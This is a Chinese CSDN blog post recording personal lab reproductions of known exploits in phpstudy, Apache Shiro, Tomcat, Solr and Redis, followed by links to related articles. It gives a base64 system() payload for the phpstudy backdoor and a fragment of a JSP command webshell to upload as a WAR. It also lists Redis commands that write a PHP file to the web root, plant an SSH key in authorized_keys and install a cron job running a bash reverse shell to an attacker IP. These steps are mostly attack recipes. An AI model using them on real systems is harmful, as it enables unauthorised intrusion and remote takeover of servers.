java 漏洞复现_漏洞复现

最新推荐文章于 2024-05-05 14:14:12 发布
最新推荐文章于 2024-05-05 14:14:12 发布
阅读量189 收藏
点赞数
文章标签: java 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35600177/article/details/114945231
版权

个人漏洞复现记录以及EXP编写。

漏洞库

phpstudy

实测2016的PHP-5.4,2018的PHP-5.2.17和PHP-5.4.45都存在此漏洞

注意请求头的Accept-Encoding后应去掉空格,Accept-Charset后值为base64编码,c3lzdGVtKCd3aG9hbWknKTs=解密为system('whoami');注意后面有分号

Shiro RCE(cve-2016-4437)

环境搭建

基于Docker,一键搭建,然后访问本地http://127.0.0.1:9000/

docker pull medicean/vulapps:s_shiro_1

docker run -d -p 9000:8080 medicean/vulapps:s_shiro_1

BurpSuite Check Tools

还没找到合适的Burp插件,可以手动添加字段rememberMe,有回显则是shiro框架

EXP

带UI的Tools 无UITools(选择攻击方式,然后x=whoami)

Tomcat Rce(CVE-2020-1938)

环境搭建

基于Docker,一键搭建,影响Apache Tomcat 6,7 < 7.0.100,8 < 8.5.51, 9 < 9.0.31.

docker pull duonghuuphuc/tomcat-8.5.32

docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32

EXP

EXP,无脑EXP直接打就完事

Tomcat WAR BackDoor

复现环境---BUUOJ

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%>"+excuteCmd(request.getParameter("cmd"))+"");}else{out.println(":-)");}%>

访问后台路径/manager/html/发现弱口令tomcat tomcat,登录后上传war文件(将上面代码写入shell.jsp,再压缩成zip文件,最后更改shell.zip为401.war即可)

Tomcat PUT(CVE-2017-12615)

复现环境----BUUOJ

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%>"+excuteCmd(request.getParameter("cmd"))+"");}else{out.println(":-)");}%>

EXP

这里就不贴了吧,后面直接上传GitHub,虽然这个洞几乎都没得了,但是仔细一点总没错嘛!

Solr RCE(CVE-2019-17558)

环境搭建

基于vulhub的docker环境包.影响Apache Solr 5.0.0版本至8.3.1,漏洞原因,params.resource.loader.enabled配置不当,我们可以自定义模板,从而任意执行命令

git clone https://github.com/vulhub/vulhub.git

cd vulhub/solr/CVE-2019-17558/

docker-compose up -d

发现方式可目录扫描或端口扫描(注意普通方式可能不会发现8983端口),

EXP

不知道为啥网上的EXP打不通,于是乎自己写了一个,后面会都放在GitHub.

首先查看有哪些core name

更改params.resource.loader.enabled配置

查看是否更改成功

Redis Getshell(Linux)

环境搭建

Ubuntu系统,一键式安装,更改配置为未授权.然后启动服务即可

sudo apt install gcc && wget http://download.redis.io/releases/redis-5.0.3.tar.gz && tar -zxvf redis-5.0.3.tar.gz && cd redis-5.0.3 && make

修改Redis启动配置文件redis.conf,将bind 127.0.0.1改为bind 0.0.0.0,关闭保护模式,protected-mode yes改为``protected-mode no`,最后保存退出.

启动服务

sudo ./redis-server ../redis.conf

Webshell

config set dir /var/www/html/

config set dbfilename info.php

set payload "<?php phpinfo();?>"

save

SSH公私钥

生成公私钥,连续三次回车即可

ssh-keygen -t rsa

config set dir /home/forever404/.ssh/

config set dbfilename authorized_keys

set payload "\n\n\nid_rsa.pub\n\n\n"

save

定时计划反弹Shell

注意这个需在Centos上方可实现,Ubuntu上亲测不可以,码.sudo systemctl stop firewalld.service关闭防火墙,

config set dir /var/spool/cron/

config set dbfilename root

set paylaod "\n\n\n* * * * * bash -i >& /dev/tcp/172.x.x.x/8888 0>&1\n\n\n"

save

主从复制

这个Redis的版本必须是4.0-5.0之间,显然看出来上面几种方法都会留下"痕迹",且要求路径,和文件写入权限等,于是乎有了新的利用方式.Redis-RCE,redis-post-exploitation.pdf.

曾秋雷
关注
复现java反序列化漏洞的方法
weixin_47623655的博客
03-30 1663
在本文中,我们学习了如何使用ysoserial来生成恶意payload,以及如何利用Python的SimpleHTTPServer模块来搭建一个HTTP服务器来接收Tomcat发送的数据包。当反序列化一个包含恶意代码的序列化数据时,攻击者可以利用该漏洞在目标系统上执行任意代码,导致系统崩溃或数据泄露。通过上面的步骤,我们可以成功地复现Java反序列化漏洞,并在使用ysoserial生成恶意payload之后,我们需要将其发送到目标服务器进行验证漏洞是否存在。接下来,我们需要构造一个包含这个类的序列化数据。
WebGoat JAVA反序列化漏洞分析复现_webgoat反序列化,苦熬一个月
2401_83974064的博客
04-18 366
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
Java安全-Java Vuls(Fastjson、Weblogic漏洞复现
Love&Share
05-05 974
复现几个 Java漏洞,文章会分多篇这是第一篇,文章会分组件和中间件两个角度进行漏洞复现 复现使用环境 Vulhub VulFocus 文章目录组件Fastjson 1.2.24 反序列化 RCEFastjson 1.2.47 反序列化 RCE中间件Weblogic 文件读取&war包上传(Vulhub)Weblogic 任意文件上传 CVE-2018-2894Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883) 组件 Fastj.
Java反序列化高危漏洞重现
qq_45498778的博客
11-27 369
Java反序列化漏洞存在着极大危害,今天我来为大家重现一下。
java struts2 漏洞复现合集
whatday的专栏
08-31 5590
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
2024年[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1),2024年最新网络安全中高级面试必知必会
m0_60691292的博客
05-05 664
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。
JAVA__安全靶场,IAST_测试用例,JAVA漏洞复现,代码审计,SAST测试用例,被动扫描,J_JavaVul.zip
最新发布
08-28
JAVA__安全靶场,IAST_测试用例,JAVA漏洞复现,代码审计,SAST测试用例,被动扫描,J_JavaVul
SpringBoot历史漏洞复现_springboot漏洞,2024年最新2024网易网络安全高级面试题及答案
m0_60567881的博客
04-18 492
2.找到属性名,使用bp抓包,抓/jolokia的包,发送到重发模块,修改包为post请求,把传输的变量改json,然后加上下面的poc,重放这个包,明文值结果包含 在 response 数据包中的 value 键中。2.执行反弹shell 的操作,先转成base64 的形式,然后再转成0x 字节的形式,访问payload,在攻击机上开启监听6666端口,执行后,可以看到返回的shell,直接在其目录下了。4.攻击机上发现文件被访问到,然后在网页上可看见/etc/passwd文件的内容。
java jmx agent不安全的配置漏洞如何改进(由浅入深代码范例和详细说明).docx
06-16
java jmx agent不安全的配置漏洞如何改进(由浅入深代码范例和详细说明).docx
javapms门户管理系统 v1.4 beta
03-15
JAVAPMS是JAVA门户管理系统(JAVA Portal Management System)的简称,以SpringMVC+Spring+Hibernate+Freemarker+Html5+jQuery为技术核心架构,面向广大站长、软件开发者、程序爱好者、网页设计师,适用于个人站长、商业企业、政府机构、教育机构和其它各种单位组织的信息门户网站建设,是一款技术先进、安全稳定、操作友好、注重用户体验的JAVA门户管理系统,倾力打造JAVA、JSP门户管理系统品牌。 JAVAPMS v1.4 更新日志:1、全面检测系统前后台,进一步提升了系统安全性;2、优化系统数据库,进一步提升了系统性能;3、升级最新版spring框架,兼容jdk1.8;4、修正子站点删除功能无效的问题;5、修正管理员删除功能无效的问题;6、修正数据库备份时间过长问题;7、修正404页面乱码问题;8、修正组图和文章分页关联问题;9、修正评论数量不更新,评论“顶”数量保存不了的问题10、修正静态页生成功能,提升生成效率;11、修正广告模板逻辑判断的问题;12、修正栏目图片无法删除的问题;13、新增图片裁剪功能;14、新
javapms门户网站源码
08-07
第1章 JAVAPMS概述 1.1. 系统简介 JAVAPMS是JAVA门户管理系统(JAVA Portal Management System)的简称,以Sping+Hibernate+Freemarker+Html5+jQuery为技术核心架构,集系统管理、文档管理、审核工作流、基于模板的文档发布、页面静态化、内容检索、多媒体文档管理于一身,面向广大站长、软件开发者、程序爱好者、网页设计师,适用于个人站长、商业企业、政府机构、教育机构和其它各种单位组织的信息门户网站建设,是一款技术先进、安全稳定、操作友好、注重用户体验的JAVA门户管理系统,倾力打造JAVA、JSP门户管理系统品牌。 1.2. 安全高效的Java语言开发 Java是一种被广泛使用的网络编程语言,主要应用于企业、政府部门、电信、银行、手机平台开发等多个领域,是现在大型软件项目开发中的主角,长期占据《TIOBE世界编程语言排行榜》第一的宝座。随着Internet的发展,Java语言以其强大的生命力得到了越来越广泛的应用。Java语言之所以受人推崇,是因为它确实称得上是一种新一代编程语言,具有面向对象、可移植性好、与硬件无关、系统强健安全、提供了并发机制、性能高的众多优点,并提供了分布性、多线程、动态性的支持。 Java作为一种重要的开发工具,它具有七个主要特性:安全性、核心API、开放式标准、分布式和动态结构、面向对象、多线程、内存管理。 TIOBE发布的编程语言排行榜 1.3. 完善合理的技术架构 系统选用了经过java社区长时间使用,被证明稳定、可靠、安全、高性能的开源框架,包括Spring、Hibernate、Freemarker、jQuery、Shiro等框架。使用这些框架可以使软件开发更加高效、易于维护,而且具有更好的性能、更高的安全性。 1.4. 全面稳定的平台兼容性 在操作系统平台兼容性方面,系统可以在Linux、UNIX、Windows等系统上运行。客户可以根据自身情况选择自己熟悉的或正在使用的操作系统,减小维护成本。 在数据库平台兼容性方面,系统数据库持久层采用hibernate实现,使得系统可以支持几乎所有的数据库平台,包括Oracle、DB2、Microsoft SQL Server、MySQL、PostgreSQL等。这对于已经购买或熟悉某一类型数据库产品的用户非常有利,用户不必购买或维护多套不同的数据库,大幅度减低成本。 在应用服务器平台兼容性方面,系统支持跨应用服务器,如Tomcat、Weblogic、Webspere、JBoss等应用服务器,很好的满足了各层次用户的需求。 在浏览器兼容性方面,目前多种浏览器并存,使用非IE浏览器的用户越来越多,即使是IE浏览器也有多种版本。系统所有web页面制作遵循w3c标准制作,采用最新的html5规范,基于div+css布局,所有标签生成的html代码都经过跨浏览器测试。javascript脚本基于jquery和javascript标准编写,有效的解决了js跨浏览器的问题,系统可以在IE6、IE7、IE8、IE9、FireFox、Chrome、Opera、Safari浏览器下平稳运行。 1.5. 强大的中文采集与检索技术 系统支持强大的中文检索组件,可以对内容进行高效的全文检索,支持所有流行文档格式的检索,能够自动提取文本正文、生成内容摘要,能够自定义检索结果展现形式,以满足不同行业的特殊要求,构建细分领域内的垂直搜索引擎。 第2章 系统功能介绍 2.1. 系统登录 管理员对网站进行日常维护前须先进入管理后台登录页面,在输入帐号和密码后即可进入后台管理中心,如果登录信息输入错误超过三次,系统将要求输入验证码,防止恶意登录行为,加强系统安全性,登录界面如下图: 2.2. 我的工作台 2.2.1. 个人资料 在我的工作台中,管理员可以点击左侧的“个人资料”修改和完善自己的帐户信息,如真实姓名、电子邮箱、联系电话等,如下图所示: 2.2.2. 修改密码 点击我的工作台左侧的“修改密码”,可以对管理员登录密码进行修改,系统要求输入原密码,然后输入两次新密码,界面如下: 2.3. 文档中心 文档中心主要管理全站信息的发布,是系统的一个核心功能,可以对全站文档进行管理,栏目管理,模型管理,文档属性管理。 2.3.1. 文档管理 点击“文档中心”左侧功能菜单的“文档管理”,文档按所属栏目树形组织管理,点击相应的栏目将会在右边显示改栏目下的文章列表,配合多样化的文章搜索功能,可根据文档标题、文档状态(草稿、审核与否、回收站等)、文章属性(普通、图文、焦点、头条等)、进行文档搜索,文档列表界面如下所示: 添加或修改文章时,可设置文档所属栏目、标题、外部链接、副标题、标题颜色、短标题、自动T
jmx-agent:jmx-agent 使用 JVM Agent 接口链接到任何 JVM,并导出 JMX Server!
06-05
jmx-agent jmx-agent 使用 JVM Agent 接口链接到任何 JVM,并导出 JMX Server! 安装 通过在启动 Java 进程时提供单个启动选项 -javaagent 来安装此代理。 java -javaagent:JmxAgent.jar=port=5678,host=localhost JmxAgent.jar 是 JMX JVM 代理的文件名。 选项可以附加为逗号分隔的列表。 host JMX 服务器应该绑定到的host地址。 如果给出“*”或“0.0.0.0”,则服务器绑定到每个网络接口localhost是localhost port JMX 服务器应该监听的端口。 默认值为5678 user用于身份验证的用户(连同密码) password用于身份验证的密码(然后也需要用户) 成功启动后,代理将打印出带有完整 URL 的成功消息,客户端可
WebGoat JAVA反序列化漏洞分析复现
leah126的博客
03-09 715
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。为此写了加密的小工具。进行简单分析一波之后,使用ysoserial生成序列化的payload,这里的话不做过多讲解,具体使用应该大家都会。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
xxe漏洞之——漏洞复现
wsnbbz的博客
03-04 1462
漏洞介绍 XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE,就必须懂得XML的一些规则。 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档...
JAVAJMX agent不安全的配漏洞修复
weixin_45536357的博客
07-25 2048
3、复制jmxremote.password.template生成jmxremote.password文件,然后删除jmxremote.password文件中所有内容。2) 将# com.sun.management.jmxremote.ssl=false修改为 (需要ssl则设置为true。3)将# com.sun.management.jmxremote.authenticate=false修改为。1) 将# com.sun.management.jmxremote.port=修改为。
复现jdcms的漏洞
p_utao的博客
09-18 1264
前期 由于玩的是靶场,所以工具都在靶场里,工具如下: 菜刀、火绒、火绒插件hackbar 复现漏洞 任意文件上传 打开网站 查看/App/Lib/Action/Home/UcAction.class.php,发现任意上传漏洞本步骤分析UcAction.class.php中的public function saveAvatar()函数查看代码漏洞任意文件上传漏洞是因为源代码的不严谨造成的,因此要发现任意文件上传漏洞,需要查看文件源代码,查看UcAction.class.php中的public functi
java jmx agent不安全的配置漏洞
weixin_51378457的博客
03-15 4642
APP应该以明示或自愿同意的方式告知用户其需要收集的信息类型、范围、目的、使用方法、储存期限、安全保护措施等信息,并在获得用户授权前明确告知用户数据是否会分享、转让等情况。在搜集用户信息时,需明确具体收集哪些信息,以及收集的目的和用途等。APP应该尊重用户的知情权、选择权、访问权、更正权、删除权、注销权等权益,让用户能够随时查看自己的信息,可以对其进行更正、删除等操作。APP应该合法、公正地收集个人信息,包括在合法法律、法规、规章、标准规定范围内的行为,如经过用户授权同意,且该同意为自愿行为等。
JAVA漏洞复现技术学习与实践指南
3. JAVA漏洞复现步骤:复现JAVA安全漏洞一般包括搭建漏洞测试环境、准备漏洞测试代码、利用工具或手动进行漏洞复现、记录复现过程中的关键步骤和输出结果。在复现过程中,可能需要配置JAVA开发环境,安装和配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值